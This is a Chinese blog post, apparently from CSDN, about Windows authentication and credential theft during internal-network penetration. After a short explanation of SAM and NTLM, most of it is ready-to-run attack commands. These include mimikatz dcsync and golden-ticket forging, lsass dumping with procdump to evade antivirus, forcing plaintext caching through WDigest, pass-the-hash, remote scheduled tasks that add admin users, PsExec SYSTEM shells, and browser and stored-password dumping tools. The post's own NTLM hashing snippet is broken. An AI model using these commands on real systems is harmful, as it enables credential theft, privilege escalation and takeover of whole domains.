windows认证&密码抓取

已于 2023-03-29 14:01:20 修改
阅读量6.2k 收藏 53
点赞数 11
分类专栏: # 内网渗透 文章标签: windows 域渗透 内网安全
于 2021-07-15 22:23:23 首次发布
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/118770420
版权

文章目录

基础知识

windows版本历史

windows历史版本:

1985:Windows 1.0
1987:Windows 2.0
1990:Windows 3.0
1995:Windows 95
1998:Windows 98
2000:Windows ME/ Windows 2000 Server
2001:Windows XP
2003:Windows Server 2003
2005:Windows Server 2003 R2
2006:Windows Vista
2008:Windows Server 2008
2009:Windows 7/ Windows Server 2008 R2
2012:Windows 8/ Windows 8.1 / Windows Server 2012
2013:Windows Server 2012 R2
2015:Windows 10
2016:Windows Server 2016
2019:Windows Server 2019
2021:Windows 11

一、工作组部分

密码存放在哪里?

一般都在C:\Windows\System32\config\SAM

当我们登录系统的时候,系统会自动地读取SAM文件中的“密码”与我们输入的“密码"进行比对,如果相同,证明认证成功!

NTML Hash

简介:
在这里插入图片描述

产生:
在这里插入图片描述

实验一下,16进制编码

str = binascii.hexlify("admin".encode())
#b'61646d696e'

unicode编码,两位一组,然后在后面加00(看图上是这么搞的)

n=2
strs = [str[i:i+n] for i in range(0, len(str), n)]
for i in strs:
	str += i+"00"
	
print(str)
#610064006d0069006e00

md4加密,这一步算出来就不对了,试了半天都不对

>>> hashlib.new('md4',str.encode()).hexdigest()
'c477236e88a7ae62a59e54e444612724'

放弃,直接使用python2的passlib中的nthash一把梭,sucess!

>>> from passlib.hash import nthash
>>> h = nthash.hash('admin')
>>> h
'209c6174da490caeb422f3fa5a7ae634'

windows本地认证

在这里插入图片描述

windows网络认证

网络认证也很简单,服务端随机产生一个16位的challenge,然后服务端,客户端都使用自己手里的ntml hashchallenge进行加密,服务端对比加密后的是否相等。
在这里插入图片描述

NTML v1与v2

vista之前:
NTML v1:可通过彩虹表还原

vista之后:
NTML v2:密码强度高,只能暴力破解

不同点:challenge长度不同8和16,加密算法不同DES和HMAC-MD5
在这里插入图片描述


二、域部分

kerbero协议

参考:Kerberos - 维基百科,自由的百科全书



白银票据

1、目标机器ntml hash

获取到了一台机器的ntml hash,可以直接伪造一个白银票据去访问这台机器



黄金票据

条件:
1、与DC通信
2、krbtgt用户的ntml hash
获取到了DC上krbtgt用户的ntml hash,可以用它伪造黄金票据,可以访问域内所有机器

黄金票据利用:(假设已经拿到域控shell)

先获取krbtgt用户的ntml hash

lsadump::dcsync /domain:hacke.testlab /user:krbtgt

在这里插入图片描述
拿到krbtgt用户的ntml hash后,就可以生成黄金票据了,有两种方法生成票据,一种是利用sid krbtgt的ntlm hash,还有一种是aes256_hmac

生成票据

#使用krbtgt的aes256_hmac值
kerberos::golden /domain:hacke.testlab /sid:S-1-5-21-335331429-2309386428-4146539646/aes256:feff09c189a9dc9ecd37910a1686beadd568c589e8a36ac
bffec5cea3ee4d119 /user:Administrator /ticket:test.kirbi
#使用krbtgt的ntlm hash值
kerberos::golden /domain:hacke.testlab /sid:S-1-5-21-335331429-2309386428-4146539646 /krbtgt:524f4bed4b8a362bda1a560b9779eadf /user:Administrator /ticket:test.kirbi

注:sid最后的-502是不需要的,例如我这里是S-1-5-21-335331429-2309386428-4146539646-502,那么就填S-1-5-21-335331429-2309386428-4146539646
查看票据是否生成

klist

利用:

先把生成的票据复制出来

copy \\10.1.1.2\c$\test.kirbi c:\

然后运行mimikatz

#导入票据
kerberos::ptt test.kirbi
#检验缓存票据
klist
#利用票据访问
net use \\xx.xx.xx.xx
dir \\xx.xx.xx.xx\c$



windows密码导出

windows密码导出分为两种方式,一种是在内存中读取,还有一种是读取sam文件。

在这里插入图片描述

lsass进程抓取

mimikatz直接操作lsass进程

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

注:因为它是从 lsass.exe进程中获取windows的账号密码,而每次关机重启后,lsass进程中的账号信息都会清空,所以只能抓到上次关机后登录过的账号密码的信息


procdump+mimikatz

procdump有windows的签名,一般不会被杀,可以用它导出lsass.dmp之后,再使用mimikatz导出密码

哥斯拉上线后上传procdump64.exe,使用它导出lsass.dmp

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

在这里插入图片描述

执行mimikatz,导出ntlm hash

mimikatz.exe "log" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

在这里插入图片描述



sam文件(密文,需要破解,或者通过hash传递使用)

用工具读取sam文件

使用mimikatz在线导出密码

mimikatz.exe "privilege::debug" "token::elevate" "log" "lsadump::sam" exit



注册表导出sam文件

管理员权限下执行 cmd

reg save hklm\sam .\sam.hiv
reg save hklm\system .\system.hiv

下载到本地 mimikatz 的目录打开 mimikatz

privilege::debug
token::elevate
lsadump::sam /sam:sam.hiv /system:system.hiv





高版本密码抓取

在 windows 10 / 2012r2 之后的系统版本中,默认情况下已禁⽤在内存缓存中存系统⽤户明⽂密码,此时再直接拿着 mimikatz 去抓明⽂,肯定是抓不到的,实际效果如下,密码字段位显示为 null:
在这里插入图片描述

⼿⼯修改注册表 + 强制锁屏 + 等待⽬标系统管理员重新登录 = 截取明⽂密

虽然默认在 2012 r2 之后的系统中已禁⽌在缓存中保存密码明⽂,但是我们已经拿到了⽬标机器的管理权限,此时可以⾃⾏通过修改注册表的⽅式来强制让它存明⽂,但前提是⽤户必须得先注销再重新登录才能⽣效,否则是获取不到的:

# 查看注册表
regedit
# 添加⼀个键和值
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential /t REG_DWORD /d 1

这个时候 UseLogonCredential 的值为就 1 ,当这台机器重启或锁屏再登录之后我们就可以抓到明⽂密码了:
在这里插入图片描述

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit"

可以发现已经抓取到了密码
在这里插入图片描述

windows凭据抓取

只要3389远程登录的时候点击记住凭证即可

查看凭据

cmdkey /list

导出

Import-Module .\Invoke-WCMDump.ps1
Invoke-WCMDump

抓到密码之后的hash传递

在这里插入图片描述
工作组环境的认证还是挺简单的,我们在获取到一台机器的hash后可以尝试哈希传递,mimikatz的方法如下:

#先提权
privilege::debug
#使用administrator用户的NTLM哈希值进行攻击
sekurlsa::pth /user:Administrator /domain:10.1.1.2 /ntlm:827701888ca1f1c728bef59f733ff69f

执行上面的命令后,会弹出一个cmd,我们可以用这个cmd直接连接该主机,还可以查看目录文件等操作(感觉不好用,实战还是用下面的psexec直接拿shell)

#将对方c盘映射到z盘
net use Z: \\10.1.1.2\c$
#文件操作
net use \\10.1.1.2\IPC$
copy test.exe \\10.1.1.2\c$
dir \\10.1.1.2\c$
# 删除ipc连接
net use \\10.1.1.2\IPC$ /del /y

ipc$常规使用流程:

# at
# 使用该方法创建远程计划任务需先建立IPC$连接。创建IPC$连接:
net use \\10.1.1.2 123456 /user:Administrator
# 创建远程计划任务:
at \\10.1.1.2 15:15 cmd.exe /c c:\\1.bat
# 执行命令
at \\10.1.1.2 12:00 cmd.exe /c net user Admin 123456 /add


# schtask
# 远程创建一次性计划任务,以下命令会创建一个名为test的计划任务:
schtasks /create /s 10.1.1.2 /tn test /sc onstart /tr "ipconfig > c:\1.txt" /ru system /f /u administrator /p 123456
# 立即执行计划任务
schtasks /run /tn test /s 10.1.1.2 /u administrator /p 123456
# 删除计划任务
schtasks /delete /tn test /f /s 10.1.1.2 /u administrator /p 123456

# server2016
winrm invoke create wmicimv2/win32_process @{commandline="\\10.1.1.2\c\test.exe"}

参考:https://www.dazhuanlan.com/2019/12/13/5df315922f254/

重点:psexec横向

在建立了 ipc$ 的情况下:还可以使用psexec获取shell

首先建立 ipc连接,利用mimikatz建立ipc连接也可以

# net建立ipc连接
net use \\10.1.1.2 /u:hacke\administrator password

然后执行如下命令,获取 System 权限的 Shell:

psexec.exe -accepteula \\10.1.1.2 -s cmd.exe
# -accepteula  第一次运行 PsExec 会弹出确认框,使用该参数就不会弹出确认框
# -s      以System权限运行远程进程,获得一个System权限的交互式Shell,如果不用这个参数,那么会获得一个administrator权限的shell

或者直接使用账号密码获取shell

PsExec64.exe -accepteula \\10.1.1.2 -s cmd.exe -u administrator -p 123456

使用mimipenguin获取linux明文登录密码

下载:https://github.com/huntergregal/mimipenguin

chmod 755 ./mimipenguin.sh
./mimipenguin.sh

kali2020上复现失败



Chrome、firefox、360 浏览器保存的密码获取

这个推荐使用Sharp-HackBrowserData,下载地址: S3cur3Th1sSh1t /
Sharp-HackBrowserData ,谷歌、火狐、IE、Vivaldi等常见的浏览器都能抓。

使用:

.\Sharp-HackBrowserData.exe

还有的工具比如BrowserGhost等。


数据库密码

SharpDecryptPwd-master,对密码已保存在 Windwos 系统上的部分程序进行解析,包括:Navicat,TeamViewer,FileZilla,WinSCP,Xmangager系列产品

> SharpDecryptPwd.exe
Usage: SharpDecryptPwd.exe -NavicatCrypto
       SharpDecryptPwd.exe -TeamViewer
       SharpDecryptPwd.exe -FileZilla
       SharpDecryptPwd.exe -WinSCP
       SharpDecryptPwd.exe -Xmangager -p Session_Path

数据库密码使用下面这个命令即可

SharpDecryptPwd.exe -NavicatCrypto



获取各类密码一把梭工具

1. GhostPack /Seatbelt ,几乎所有你能想到的它都能收集。

使用:

Seatbelt.exe -group=all -full -outputfile="C:\Temp\out.txt"

2.LaZagne是⽤于开源应⽤程序获取⼤量的密码存储在本地计算机上。每个软件都使⽤不同的技术(明⽂、API、⾃定义算法、数据库等)存储其密码。开发此⼯具的⽬的是为最常⽤的软件查找这些密码。

下载地址:https://github.com/AlessandroZ/LaZagne

使⽤方法:

laZagne.exe all



电脑上的敏感文件

将c盘所有文件的文件名写入logc.txt里

dir /s /a c:\ > logc.txt

找出所有包含password的文件

findstr /si password *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
天问_Herbert555
关注
  • 11
    点赞
  • 53
    收藏
    觉得还不错? 一键收藏
  • 9
    评论
专栏目录
窥秘Windows 10:SAM密码破解
Sgirll的博客
10-01 3399
Windows 10作为广受欢迎的操作系统,拥有一套强大的安全措施来保护用户账号和数据安全。然而,有时候我们需要了解更多关于密码破解的知识,以加强我们的防护措施。本文将深入探讨如何突破Windows 10的SAM密码,以便更好地了解密码安全性并加强系统的保护。
如何获取windows系统SAM密码
m0_60870041的博客
11-30 3650
获取windows系统SAM密码
资料总结分享:SAM,bam,bed文件格式
最新发布
weixin_69558614的博客
05-07 1220
表示read比对到RNAME这条序列的最左边的位置,如果该read能够完全比对到这条序列(CIGAR string为M)则这个位置是read的第一个碱基比对的位置,如果该read的反向互补序列比对到这条序列,则这个位置是read的反向互补序列的第一个碱基比对的位置,所以无论该read是正向比对到该序列,或是其反向互补序列比对到该序列,比对结果均是最左端的比对位置。SAM文件中的每一行包含了比对的序列ID、比对的标志、参考序列的名称、序列的起始位置、比对得分、序列的序列等信息。
windows用户密码破解
qq_45927819的博客
03-03 1万+
文章目录一、hash简介二、Windows系统下的hash密码格式三、windows hash抓取1、通过SAM文件+mimikatz读取密码2、mimikatz3、procdump64+mimikatz4、QuarksPwDump5、wce四、利用Hash远程登录系统 一、hash简介 Hash主要用于信息安全中加密算法,渗透测试中获取目标系统的明文或Hash往往是整个渗透测试过程中重要的一环。在Windows系统中本机用户的密码Hash是放在本地的SAM文件里面,内用户的密码Hash是存在控的N
读取SAM文件密码
12-21
SAMInside为一款俄罗斯人出品Windows密码恢复软件,支持Windows NT/2000/XP/Vista操作系统,主要用来恢复Windows的用户登录密码
win10的SAM密码破解
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
04-25 3709
因为win10这里的目录受保护。
SAM文件解读
weixin_69556916的博客
05-04 2972
在进行该第列值的计算时,如果取第6列的数值,一定要取出现M的值,S或H的值不能取。4)POS 1-Based的比对上的最左边的定位,表示read比对到RNAME这条序列的最左边的位置,如果该read能够完全比对到这条序列(CIGAR string为M)则这个位置是read的第一个碱基比对的位置,如果该read的反向互补序列比对到这条序列,则这个位置是read的反向互补序列的第一个碱基比对的位置,所以无论该read是正向比对到该序列,或是其反向互补序列比对到该序列,比对结果均是最左端的比对位置。
mimikatz免杀之通过SAM和System文件抓取密码
m0_47083622的博客
04-19 8558
最近学习使用Mimikatz工具抓取Windows密码时发现Procdump、SQLDumper、DumpMinitool等一系列能导出lsass进程的工具已经被360“拉黑”了。不过还可以通过SAM和System文件抓取密码和Hash,目前测试360和火绒都不会拦截 以下为操作: 利用注册表命令将目标机的sam或者system文件导出 reg save hklm\sam sam.hive reg save hklm\system system.hive 然后将目标机上的sam.hive和syst
win10提取并解密sam文件中的hash值
feigerger的博客
07-07 4800
win10密码破解,提取SAM文件
Mimikatz Windows 密码抓取神器
05-27
这款工具因其强大的密码抓取能力而闻名,可以提取出系统内存中的明文密码、哈希值以及其他敏感凭证,从而帮助安全研究人员检测系统的漏洞和防护措施。 在Windows环境中,Mimikatz 能够执行以下关键功能: 1. **LSA...
mimikatz(windows 明文密码抓取工具)
04-02
**mimikatz:Windows明文密码抓取工具详解** mimikatz是一款由法国安全研究员Benjamin Delpy开发的开源工具,主要用于在Windows操作系统中获取明文密码、 kerberos票据、LSA秘密等敏感信息。由于其功能强大且易于...
Windows开机账户与密码获取工具
11-23
在这个上下文中,可能是mimikatz的一部分,定义了与密码抓取相关的函数或接口。 2. **README.md**:这是一个Markdown格式的文档,通常包含关于项目的基本信息、使用说明、安装指南和可能的贡献方式。在这个工具中,...
系统密码截获源代码.rar_Windows 密码_系统密码
09-24
标题中的"系统密码截获源代码.rar_Windows 密码_系统密码"涉及到的是Windows操作系统中密码获取的技术,特别是通过编程方式来实现对密码框中输入的密码进行截取。这通常涉及到底层系统交互、Windows API调用以及可能...
获取Windows明文密码mimikatz2.2-x64.rar
03-19
标题 "获取Windows明文密码mimikatz2.2-x64.rar" 指向的是一个使用...同时,了解如何防范此类攻击,例如定期更改复杂密码,启用多因素认证,以及保持系统更新和打补丁,对于任何Windows用户来说都是至关重要的。
sam文件获取与解密
热门推荐
Shanfenglan's blog
08-21 29万+
前言 ntds.dit文件位置: C:\Windows\NTDS\NTDS.dit system文件位置:C:\Windows\System32\config\SYSTEM sam文件位置:C:\Windows\System32\config\SAM #通过SAM数据库获得用户hash的方法 远程读取 mimikatz在线读取SAM数据库 privilege::debug token::elevate lsadump::sam powershell 利用empire里面的一个powershell
内网渗透(二十四)之Windows协议认证密码抓取-Mimikatz读取sam和lsass获取密码
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-14 775
ProcDump 还包括使用窗口挂起 (使用相同的窗口挂起定义,Windows任务管理器使用) 、未经处理的异常监视,并且可以根据系统性能计数器的值生成转储。3、使用PowerSploit 的Out-MiniDump模块,PowerSploit是一个基于 Powershell 的渗透工具包,可以选择创建进程的完整内存转储。从lsass进程中提取passwords、keys、pin、tickets等信息。2、使用procdump 导出lsass.dmp文件。5、读取lsass.dmp文件
通过SAM文件获取windows7密码
05-10 5934
步骤一:获取目录C:Windows\System32\config下的SAM和SYSTEM文件 步骤二:使用SAMInside获取用户的NT-HASH 步骤三:到https://www.objectif-securite.ch/ophcrack这个网站输入nt-hash值,在线计算出密码
读取计算机中开机密码,【计算机】开机密码,SAM
weixin_35886636的博客
07-28 961
该楼层疑似违规已被系统折叠隐藏此楼查看此楼来讲一下这个操作的步骤吧.(这个到微软的知识库里可查到)你有双系统的话而且另一个系统能正常进入的话.那将是非常简单的.只需要把c:\windows\repair下的software,system,security,default和sam五个文件拷到c:\windows\system32\config下.覆盖原来的文件.重启即可.如果没有双系统的话.如果C...
服务器系统文件sam在哪里,sam文件被删除的解决方法(多种途径)
weixin_34522296的博客
08-12 6356
sam文件被删除的解决方法(多种途径)发布时间:2013-06-04 09:29:45 作者:佚名 我要评论SAM文件即账号密码数据库文件SAM文件的位置是:C:\Windows\System32\Config\SAM(以系统安装在C盘为例),下面与大家分享下具体的解决方法,遇到类似情况的朋友可以参考下哈我们首先来了解一下,SAM文件的存放位置。SAM文件的位置是:C:\Windows...
wireshark抓取ftp用户密码
06-28
### 回答1: Wireshark可以通过抓取FTP数据包来获取用户密码。具体步骤如下: 1. 打开Wireshark软件,选择要抓取FTP数据包的网络接口。 2. 在过滤器中输入“ftp”,以过滤出FTP数据包。 3. 打开FTP连接,输入用户名和密码。 4. Wireshark会自动捕获FTP数据包,可以通过查看数据包的详细信息来获取用户名和密码。 需要注意的是,抓取他人的FTP用户密码是违法的行为,应该遵守相关法律法规。 ### 回答2: Wireshark是一款免费且开放源代码的网络协议分析工具,它支持多种网络协议的抓包分析,其中也包括FTP协议。FTP是一种用于文件传输的协议,通过Wireshark可以轻松地抓取FTP用户密码。 首先,我们需要在Wireshark中开启FTP过滤器,在菜单栏中选择“分析”-“显示过滤器”-“FTP”,选择其中的“ftp.request.command == USER || ftp.request.command == PASS”,这样Wireshark就会仅显示FTP请求中的用户名(USER)和密码(PASS)。 然后,我们需要在Wireshark中开始抓包,通过选择适当的网络接口并点击“开始”按钮来启动抓包。此时,Wireshark会开始监控并捕获网络数据包,我们可以将这些数据包保存以备后续分析。 接下来,我们需要在FTP客户端中输入用户名和密码,Wireshark会自动捕获到这些数据包并在我们之前设置的过滤器中显示出来,其中会包含明文的用户名和密码信息。这是因为FTP是一种不加密的协议,所以可以轻松地捕获到其中的用户密码。 最后,我们需要注意保护用户密码安全性,建议用户在使用FTP时使用加密的方式进行传输,或使用更安全的协议,如SFTP或SCP等。同时,也要注意保护系统的网络安全,以免遭受黑客攻击或数据泄露等问题。 总之,Wireshark可以轻松地抓取FTP用户密码,但在使用FTP协议时应注意数据的安全性。如果需要更高级别的保护,请使用安全加密协议。 ### 回答3: Wireshark是一款常用的网络协议分析工具,可以抓取网络数据包及解码协议,可以帮助我们监控、分析网络通信中的故障和安全隐患。FTP协议是一种用于文件传输的网络协议,使用基于明文的身份验证机制,因此在传输时容易被黑客窃取用户名密码等敏感信息。本文将介绍如何使用Wireshark来抓取FTP用户密码。 第一步:打开Wireshark并设置FTP过滤器 首先下载安装Wireshark,打开软件后,在过滤器个栏中输入ftp,然后点击过滤按钮,只留下与FTP相关的数据包。这样可以过滤掉无关的数据包,让后续抓包分析更加简单。 第二步:使用FTP客户端登陆FTP服务器 使用FTP客户端,使用FTP用户名和密码登陆FTP服务器,在登陆成功后,可以开始抓取数据包。在Wireshark软件中,点击“捕获选项”按钮,选择需要的网络适配器。在打开捕获窗口中,点击启动捕获按钮可以开始抓包。 第三步:分析抓取的数据包 在抓取数据包期间,Wireshark将记录所有传输的数据。可以在捕获选项中设置过滤器,只捕捉FTP服务器地址或FTP客户端的IP地址等信息,以便更快速地分析需要的数据包。当抓取到用户登录FTP服务器的数据包时,可以通过查看数据包的详细信息来获取登录的用户名和密码。 第四步:看FTP的明文口令 FTP客户端的身份验证信息是通过明文进行传输,因此在Wireshark中可以看到明文口令。在查看数据包的详细信息时,点击“数据包内容”,可以看到FTP客户端发送给服务器的登录信息,其中包含用户名和密码等信息,可以在这里定位到FTP用户密码。 总之,Wireshark可以帮助我们监控并分析FTP传输中的数据包信息,获得FTP用户密码等重要信息。需要注意的是,抓包操作本质上就是在截获网络上的数据流,因此务必遵守网络法律法规,切勿进行任何违法活动,谨慎使用此类工具。
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值